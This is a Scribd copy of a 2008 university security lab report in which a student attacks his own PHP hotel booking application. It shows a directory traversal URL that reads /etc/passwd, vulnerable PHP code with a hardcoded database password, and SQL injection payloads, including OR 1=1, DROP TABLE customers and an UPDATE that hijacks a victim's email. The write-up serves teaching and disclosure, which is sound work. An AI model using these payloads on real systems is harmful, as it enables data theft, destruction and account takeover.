Scribd Logo
Upload

Welcome to Scribd!

  • John Kojo Ampia - Addison

    Uploaded by

    jojoaddison
    36 views5 pages
    This document describes two vulnerabilities found in a hotel booking application: a directory traversal attack and SQL injection. The directory traversal attack allowed changing the 'file' parameter to access files on the server, such as '/etc/passwd' which returned the system password file. The SQL injection vulnerability allowed manipulating queries by adding SQL code to the 'email' parameter. This could allow actions like deleting all customer data by adding a DROP TABLE statement to the query. Validation of user inputs could have prevented these attacks.

    Original Description:

    Original Title

    lab1_0226528

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document describes two vulnerabilities found in a hotel booking application: a directory traversal attack and SQL injection. The directory traversal attack allowed changing the 'file' parameter to access files on the server, such as '/etc/passwd' which returned the system password file. The SQL injection vulnerability allowed manipulating queries by adding SQL code to the 'email' parameter. This could allow actions like deleting all customer data by adding a DROP TABLE statement to the query. Validation of user inputs could have prevented these attacks.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    36 views5 pages

    John Kojo Ampia - Addison

    Uploaded by

    jojoaddison
    This document describes two vulnerabilities found in a hotel booking application: a directory traversal attack and SQL injection. The directory traversal attack allowed changing the 'file' parameter to access files on the server, such as '/etc/passwd' which returned the system password file. The SQL injection vulnerability allowed manipulating queries by adding SQL code to the 'email' parameter. This could allow actions like deleting all customer data by adding a DROP TABLE statement to the query. Validation of user inputs could have prevented these attacks.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 5

    E0226528 -1-

    John Kojo Ampia – Addison

    E0226528

    033526

    Internet - Security VU SS 2008

    John Kojo Ampia – Addison Internet Security VU WS 2007


    E0226528 -2-
    Lab 1 : Directory Traversal Attack

    This attack is based on a Web Application for Hotel Booking and Reservation System I wrote for a client.
    It can be found at: http://www.j2nghana.com/requestform.php
    This application registers customers and guides them through a room booking process, which when completed,
    generates an invoice for the client to save on their workstation.
    This is what normally happens after the invoice generator has completed processing and generated the file:
    The following finished.php script was called with the query-string of the client’s details and booking information by the
    invoice-generator script, after it has generated and stored the invoice on the server.
    http://192.168.1.2/ipayment/finished.php?3=3&fin=finished&customerId=84&invoiceId=100&persons=1&arrival=Jun
    %2015,%202008,%2000:00&departure=Jun%2025,%202008,%2000:00&days10&file=/var/www/html/ipayment/invoices/84_1
    4-06-2008_invoice_100.pdf
    The file parameter of the query-string contains the path to the stored invoice file.
    Now in this attack the file parameter was changed to read:
    ie.

    http://192.168.1.2/ipayment/finished.php?3=3&fin=finished&customerId=84&invoiceId=100&persons=1&arrival=Jun
    %2015,%202008,%2000:00&departure=Jun%2025,%202008,%2000:00&days10&file=/etc/passwd
    file=/etc/passwd

    To the surprise and amazement of this author, the script returned an “application-pdf” file, which however turned out to
    be a text file and could be opened in any text editor!

    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    named:x:25:25:Named:/var/named:/sbin/nologin
    sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
    webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
    squid:x:23:23::/var/spool/squid:/sbin/nologin
    pcap:x:77:77::/var/arpwatch:/sbin/nologin
    jojo:x:500:500::/home/jojo:/bin/bash
    postfix:x:89:1000::/var/spool/postfix:/sbin/nologin
    proftpd:x:5000:5000:proftpd virtual user:/bin/null:/bin/false
    tomcat:x:5001:5001::/etc/tomcat:/sbin/nologin
    xms:x:5002:5002::/home/web:/sbin/nologin
    courier:x:5003:5003::/usr/local:/bin/bash
    vmail:x:1001:5004::/home/vmail:/bin/bash
    mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash

    Practically everything in the /etc/passwd file was return, for brevity, I have removed some of the entries.
    My own account entry is: jojo:x:500:500::/home/jojo:/bin/bash

    John Kojo Ampia – Addison Internet Security VU WS 2007


    E0226528 -3-
    Now here are the scripts that together did the damage:

    The script finish.php contains the following lines, which dutifully takes the value of the file parameter without question.

    $file='';
    if(isset($_REQUEST['file']))$file=$_REQUEST['file'];

    The file parameter is passed on with the fname parameter representing the file name to this
    savePDF.php script in a hidden iframe to cause the download to occur instantaneously:

    <iframe name='fileFrame' id='fileFrame'


    src="savePDF.php?name=<?=$fname?>&file=<?=$file?>"
    frameborder='0' width='0' height='0'></iframe>

    This is the output of the savePDF.php script

    <?
    $name="xyz_reservation_invoice";
    if(isset($_GET['name']))$name = $_GET['name'];
    $file="";
    if(isset($_GET['file']))$file = $_GET['file'];
    if(strlen($file)>0 && is_file($file)){
    //echo $file;
    header('Content-type: application/x-pdf');
    header('Content-Disposition: attachment; filename="'.$name.'"');
    readfile($file);
    }else die("Failed opening ".$name);
    ?>

    This code simply accepts the parameters, checks if the file exists, and happily returns the file to the receiver.

    There are no checks whatsoever on the type of file and the directory path involved.

    An attacker examining the html source code can easily discover the script in the iframe and use it to download
    everything possible from the webserver.

    I have fixed the application since discovering this vulnerability through this exercise!

    John Kojo Ampia – Addison Internet Security VU WS 2007


    E0226528 -4-
    Lab 1: SQL Injection
    SQL injection vulnerability existed on this Web-application as well.
    The following except is drawn from the script idReminder.php, which is used to send client IDs per email, if a client
    needed a reminder.
    Here are the files involved (customers.sql):
    CREATE TABLE `customers` (
    `ID` smallint(6) NOT NULL auto_increment,
    `EMAIL` varchar(80) NOT NULL,
    `TITLE` varchar(10) NOT NULL,
    `FULLNAME` varchar(240) NOT NULL,
    `ADDRESS` varchar(240) NOT NULL,
    `ZIP` varchar(100) NOT NULL,
    `CITY` varchar(200) NOT NULL,
    `REGION` varchar(200) NOT NULL,
    `COUNTRY` varchar(200) NOT NULL,
    `TELEPHONE` varchar(50) NOT NULL,
    `MOBILE` varchar(50) NOT NULL,
    PRIMARY KEY (`ID`,`EMAIL`),
    UNIQUE KEY `EMAIL` (`EMAIL`)
    ) ENGINE=MyISAM DEFAULT CHARSET=latin1 PACK_KEYS=0 AUTO_INCREMENT=84;

    Some data entries:


    INSERT INTO `customers` (`ID`, `EMAIL`, `TITLE`, `FULLNAME`, `ADDRESS`, `ZIP`, `CITY`, `REGION`,
    `COUNTRY`, `TELEPHONE`, `MOBILE`) VALUES(1, 'jojoaddison@yahoo.com', '&nbsp;', 'Jojo Addison',
    'Burggasse 51/8/1/62', 'A-1070', 'Vienna', 'Vienna', 'AUSTRIA', '&nbsp;', '&nbsp;');
    INSERT INTO `customers` (`ID`, `EMAIL`, `TITLE`, `FULLNAME`, `ADDRESS`, `ZIP`, `CITY`, `REGION`,
    `COUNTRY`, `TELEPHONE`, `MOBILE`) VALUES(2, 'kojoampia@yahoo.com', '&nbsp;', 'Kojo Ampia',
    'Garnisongasse 14-16/107', 'A-1090', 'Vienna', 'Vienna', 'AUSTRIA',
    '&nbsp;', '&nbsp;');

    The script contains these entries:


    If(isset($_REQUEST[‘email’])){
    $email = $_REQUEST[‘email’];
    $result = getCustomerFromEmail($email);
    If(isset($result)){
    $Header="From: <office@support-service.com>\nReplyTo: Support <office@support-service.com>\n\n";
    $sent = mail($email,'Support ID Reminder',$result,$Header);

    }
    }

    function getCustomerFromEmail($email=''){
    $host = "localhost"; $username="root"; $passwd="secret"; $dbase="reservationDB";
    if(!mysql_connect($host,$username,$passwd)){die("Could not connect to Database");}
    if(!mysql_select_db($dbase)){ die("Failed to select database $dbase: " . mysql_error());}
    $sql="SELECT ID FROM customers WHERE EMAIL='".$email."'";
    $result = mysql_query($sql);
    if(!isset($result))die("Failed to execute query [$sql] : " . mysql_error());
    if($row = mysql_fetch_assoc($result)){$result = $row['ID'];}
    return $result;
    }

    Although the above code works correctly to return all the IDs associated with the email address, because no
    validation checks are conducted on the input parameter, the following manipulation:
    http://192.168.1.2/ipayment/idReminder.php?email=jojoaddison@yahoo.com’%20OR%201%3D1%20--%20

    will result in the following query:


    SELECT ID FROM customers WHERE EMAIL=’jojoaddison@yahoo.com’ OR 1=1 - - ‘

    A much malicious user with the knowledge of the table name could do much harm with this:
    http://192.168.1.2/ipayment/idReminder.php?email=jojoaddison@yahoo.com’%20OR%201%3D1%20;DROP%20TABLE%20cust
    omers%20--%20

    Resulting in this query, to completely inundate the customer table.


    SELECT ID FROM customers WHERE EMAIL=’jojoaddison@yahoo.com’ OR 1=1; DROP TABLE customers -- ‘

    John Kojo Ampia – Addison Internet Security VU WS 2007


    E0226528 -5-
    But poking around blindly with a brute force attack, it is only a matter of time before a determined attacker discovers
    the table name using variants of the attacks below,

    SELECT ID FROM customers WHERE EMAIL='x' AND 1=(SELECT COUNT(*) FROM tabname); --';

    The following though will confirm that the table name is correct when the error “Sorry we did not find any records
    that match the email address: x “
    SELECT ID FROM customers WHERE EMAIL='x' AND customers.email IS NULL; --';

    With signatures of the above manipulations, it is clear that a malicious attacker can even update the record of
    another user on the system by the changing the email of the victim to one of the attacker’s choice as shown here
    further on:
    First though, the following will confirm the existence of a valid user:

    SELECT ID FROM customers WHERE EMAIL = 'x' OR FULLNAME LIKE '%jo%';

    Another brute force tactic would confirm that the user jojoaddison@yahoo.com actually exists, with a confirmation
    message that the ID has been sent.

    SELECT ID FROM customers WHERE EMAIL = 'jojoaddison@yahoo.com';

    Consequently the attacker can then update the entry with an email of the attacker’s choice.

    SELECT ID FROM customers WHERE EMAIL= 'x'; UPDATE customers SET email = 'wizzi@killwizards.net' WHERE email
    = 'jojoaddison@yahoo.com';

    The attacker would then come back and use the idReminder.php script to get the ID of the victim posted via email.

    John Kojo Ampia – Addison Internet Security VU WS 2007

    You might also like